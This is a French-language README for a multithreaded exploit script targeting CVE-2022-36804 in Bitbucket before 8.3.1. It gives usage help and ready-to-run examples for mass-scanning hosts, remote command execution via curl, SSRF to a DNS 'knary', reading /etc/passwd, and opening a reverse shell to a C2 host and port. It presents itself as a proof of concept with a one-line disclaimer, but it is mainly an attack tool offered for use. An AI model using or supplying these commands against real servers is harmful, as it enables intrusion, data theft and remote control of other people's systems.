
Script d'exploitation multithreadé pour CVE-2022-36804 affectant les versions de BitBucket <8.3.1
Script d'exploitation multithreadé pour CVE-2022-36804 affectant (la plupart) des versions de BitBucket <8.3.1 Voir l'avis complet ici https://jira.atlassian.com/browse/BSERV-13438
Tout le crédit à TheGrandPew pour la découverte
Le script détecte automatiquement les dépôts publics situés sur des instances Bitbucket, puis sélectionne un dépôt aléatoire pour vérifier ou effectuer la vulnérabilité. S'il n'y a pas de dépôts publics, un cookie 'BITBUCKETSESSIONID' valide est nécessaire pour exploiter les instances vulnérables connues.
Le PoC a été conçu pour prendre plusieurs hôtes en entrée et rediriger les hôtes vulnérables vers la sortie standard, permettant le piping des résultats afin d'être traités par d'autres outils.
Ne pas utiliser à des fins malveillantes.
usage: CVE-2022-36804.py [-h] [--auth-cookie AUTH_COOKIE] [--proxy PROXY] [-e {check,rce,ssrf,download,rev_shell}] [--cmd CMD] [--knary KNARY] [--server-file SERVER_FILE] [--host HOST] [--port PORT]
[--skip-check] [-t THREADS] [-v]
repos [repos ...]
CVE-2022-36804 Exploit Script for BitBucket versions < 8.3.1
optional arguments:
-h, --help show this help message and exit
required arguments:
repos Repository host/s (http://bitbucket.example.com:7990) (or single input file "./targets.txt" of target hosts) to perfrom CVE-2022-36804 on
optional arguments:
--auth-cookie AUTH_COOKIE
Authentication cookie 'BITBUCKETSESSIONID' value for private repositories
--proxy PROXY HTTP Proxy: <http/https>://<ip>:<port>
-e {check,rce,ssrf,download,rev_shell}, --exploit {check,rce,ssrf,download,rev_shell}
Exploit to perform
--cmd CMD Command to execute for the 'rce' exploit (curl http://example.com)
--knary KNARY Knary to respond too via DNS for the 'ssrf' exploit
--server-file SERVER_FILE
Server file to download for the 'download' exploit (/etc/passwd)
--host HOST Hostname or IP address of c2 for the 'rev_shell' exploit
--port PORT Port of the c2 for the 'rev_shell' exploit
--skip-check Skip vulnerability checking stage
-t THREADS, --threads THREADS
Worker Threads
-v, --verbose Increase output verbosity level
Hôte unique
CVE-2022-36804.py http://bitbucket.local:7990/Plusieurs hôtes et redirection des hôtes vulnérables et des dépôts exploités vers un fichier
CVE-2022-36804.py ./bitbucket-hosts.txt > vulnerable-hosts
CVE-2022-36804.py -e rce --cmd "curl http://example.com/" http://bitbucket.local:7990/
Effectuer une requête DNS vers le knary spécifié
CVE-2022-36804.py -e ssrf --knary http://knary.example.com http://bitbucket.local:7990/
Télécharger un dépôt avec le fichier cible
/etc/passwd, cela sauvegardera le dépôt compressé avec un nom de fichier aléatoire.
CVE-2022-36804.py -e download --server-file /etc/passwd http://bitbucket.local:7990/
CVE-2022-36804.py -e rev_shell --host 127.0.0.1 --port 31337 http://bitbucket.local:7990/